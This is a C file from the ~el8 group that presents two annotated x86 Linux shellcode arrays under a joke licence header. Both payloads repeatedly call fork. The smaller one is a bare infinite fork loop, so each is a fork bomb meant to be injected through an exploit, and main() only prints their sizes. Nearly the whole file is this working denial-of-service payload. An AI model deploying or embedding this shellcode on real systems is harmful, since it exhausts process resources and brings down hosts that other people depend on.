/***********************************************
* released under (E) licensing ... *
* (E) RULES AND REGULATIONS *
* permission to use/rewrite/add : granted *
* permission to trojan/steal : denied *
* permission to use illegally : denied *
* permission to use on /dev/urandom : denied *
***********************************************/
/* contact el8@press.co.jp for full license */
/* code copyrighted by ~el8 -- don't infringe! */
#include <stdio.h>
/*
* ~el8 shellcode !!!!!!!
*
*/
unsigned char shellcode[] =
{
0x31, 0xc9, /* xorl %ecx,%ecx */
0x41, /* incl %ecx */
0x41, /* incl %ecx */
0x31, 0xc0, /* xorl %eax,%eax */
0xb0, 0x02, /* movb $0x2,%al */
0xcd, 0x80, /* int $0x80 */
0xb0, 0x25, /* movb $0x25,%al */
0x31, 0xdb, /* xorl %ebx,%ebx */
0x89, 0xd9, /* movl %ebx,%ecx */
0xb1, 0x11, /* movb $0x11,%cl */
0xcd, 0x80, /* int $0x80 */
0xe2, 0xee, /* loop 4 */
0x55, /* pushl %ebp */
0x89, 0xe5, /* movl %esp,%ebp */
0x53, /* pushl %ebx */
0x31, 0xc0, /* xorl %eax,%eax */
0x31, 0xc9, /* xorl %ecx,%ecx */
0x41, /* incl %ecx */
0x41, /* incl %ecx */
0xb0, 0xa2, /* movb $0xa2,%al */
0x89, 0x4d, 0xf0, /* movl %ecx,0xfffffff0(%ebp) */
0x31, 0xc9, /* xorl %ecx,%ecx */
0x89, 0x4d, 0xf4, /* movl %ecx,0xfffffff4(%ebp) */
0x89, 0x4d, 0xf8, /* movl %ecx,0xfffffff8(%ebp) */
0x89, 0x4d, 0xfc, /* movl %ecx,0xfffffffc(%ebp) */
0x8d, 0x5d, 0xf0, /* leal 0xfffffff0(%ebp),%ebx */
0x8d, 0x4d, 0xf8, /* leal 0xfffffff8(%ebp),%ecx */
0xcd, 0x80, /* int $0x80 */
0x31, 0xc9, /* xorl %ecx,%ecx */
0x41, /* incl %ecx */
0x89, 0xcb, /* movl %ecx,%ebx */
0x89, 0xc8, /* movl %ecx,%eax */
0xcd, 0x80, /* int $0x80 */
0x00
};
unsigned char smallcode[] =
/* a _much_ smaller version (no exit().. or exit for that matter :-) */
{
0x31, 0xC0, /* xorl %eax, %eax */
0xB0, 0x02, /* movb $2,%al */
0xCD, 0x80, /* int $0x80 */
0xEB, 0xF8, /* jmp baq_and_touch_yourself */
0x00 /* add a null byte for flavor */
};
int main(void *a,void **b)
{
printf("1(%i,%Zi 0x%Zx)\n",strlen(shellcode),sizeof(shellcode),sizeof(s
hellcode));
printf("2(%i,%Zi 0x%Zx)\n",strlen(smallcode),sizeof(smallcode),sizeof(s
mallcode));
return (0);
}
syntax highlighted by Code2HTML, v. 0.9.1